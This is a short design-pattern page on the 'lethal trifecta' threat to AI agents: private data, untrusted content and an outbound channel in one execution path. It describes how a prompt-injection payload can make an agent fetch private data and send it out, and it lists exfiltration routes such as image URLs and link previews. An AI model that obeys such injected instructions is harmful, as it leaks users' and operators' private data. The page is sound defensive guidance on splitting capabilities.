Safety & Control

Lethal Trifecta Threat Model

Block prompt-injection-driven exfiltration by ensuring no single agent execution path holds all three of: access to private data, exposure to untrusted content, and an outbound communication channel.

Problem

An attacker only has to plant one well-crafted prompt-injection payload in any piece of untrusted content the agent will read. Once that payload reaches a model that also has access to private data and an outbound channel, the injection can instruct the model to fetch the private data and ship it out, and the model has no reliable way to refuse, because instructions inside data look indistinguishable from instructions in the system prompt. Filtering the untrusted content is unreliable, prompting the model to ignore embedded instructions is unreliable, and the outbound channels are easy to overlook — image URLs, link previews, error reports, and ordinary tool calls all serve as exfiltration paths.

Solution

Treat the three capabilities — **private-data read**, **untrusted-content ingest**, and **outbound communication** — as a tagged capability set on every tool and data source. For each agent execution path, enforce at orchestration time that at least one of the three is missing. Concrete moves: split the agent into two runs (one that reads private data, one that reads untrusted content), strip outbound network for the run that touches both, or sanitise untrusted content into typed fields before it reaches private-data context. The check is performed by the host, not by guardrail prompts.

When to use

  • The agent processes content the operator does not control.
  • The same agent has access to data or credentials the operator wants to keep private.
  • The tool catalogue includes any tool that can reach a destination the operator does not control.

Open the full interactive page

Diagram, neighbourhood map, code examples, related patterns and full provenance.

Related